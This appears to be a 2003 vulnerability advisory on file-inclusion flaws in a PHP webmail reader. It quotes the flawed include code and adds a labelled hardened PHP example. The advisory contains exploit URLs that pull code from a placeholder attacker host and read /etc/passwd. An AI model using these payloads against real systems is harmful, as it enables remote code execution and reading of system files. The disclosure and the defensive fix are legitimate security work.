From: MGhz (magas_at_mail.lt)
Date: Sun Feb 09 2003 - 04:05:59 CST


    Version : 0.2;0.3;0.4
    Website : http://www.isoca.com/
    Problems : Include file (local, remote)

    Version: 0.2;0.3

    File:
    ---------------------------------
    email.php3 (version 0.2) ; email.php (version 0.3)
    ---------------------------------

    PHP Code:
    ---------------------------------
    [...]
    require('emailreader.ini');
    if ($login > "") {
     parse_str($param);
     include($cer_skin);
     include('email.inc');
     $mbox = openimap($server, $username, $password);
     $text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
    [...]
    ---------------------------------

    Exploit :
    ---------------------------------
    http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php
    -->
    include http://[attacker]/code.php on remote server

    ---
    include local file 
    -->
    http://[target]/email.php?login=attacker&cer_skin=/etc/passwd 
    --------------------------------- 
    

    Versions: 0.4

    File:
    ---------------------------------
    webmail/lib/emailreader_execute_on_each_page.inc.php
    ---------------------------------

    PHP Code:
    ---------------------------------
    [...]
    $param = imap_base64($login);
    parse_str($param);

    include($emailreader_ini);
    include('lib/'.$server_type.'.inc.php');
    include('skin/emailreaderskin_'.$lang.'.php');
    [...]
    ---------------------------------

    Exploit :
    ---------------------------------
    http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php
    -->
    include http://[attacker]/code.php on remote server

    ---
    include local file
    -->
    http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=/etc/passwd
    ---------------------------------

    -- (if register_globals=ON) --

    -- magasmail.lt
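
A hardened form of the include pattern quoted in the advisory, added here as an example; it is not code from the original post or from the project. SKIN_DIR, the allowlist entries and the function names are hypothetical; the emailreaderskin_ file prefix follows the 0.4 code shown above.

```php
<?php
// Added example: never pass a request-derived value straight to include().
// Server settings that also apply: register_globals off (removed in PHP 5.4)
// and allow_url_include=Off in php.ini.
declare(strict_types=1);

const SKIN_DIR = __DIR__ . '/skin';            // hypothetical location
const ALLOWED_SKINS = ['default', 'classic'];  // constructed names

/** Map an untrusted skin name to a file under the skin directory, or null. */
function resolve_skin(string $name, string $dir = SKIN_DIR, array $allowed = ALLOWED_SKINS): ?string
{
    // 1. Exact allowlist match rejects URLs, absolute paths and "../".
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: the resolved path must stay inside $dir.
    $base = realpath($dir);
    $path = realpath($dir . '/emailreaderskin_' . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

/** Unpack a parameter string into an array, not into the current scope. */
function read_params(string $packed): array
{
    $out = [];
    parse_str($packed, $out);  // with a result array, no variables are created
    return $out;
}

// Constructed input resembling the request shape described in the advisory.
$params = read_params('cer_skin=http://example.invalid/code.php&msgid=3');
$wanted = $params['cer_skin'] ?? '';
$skin   = resolve_skin(is_string($wanted) ? $wanted : '');
if ($skin === null) {
    $skin = resolve_skin('default');  // fall back to a fixed, known skin
}
if ($skin !== null) {
    include $skin;  // only ever a file that passed both checks
}
```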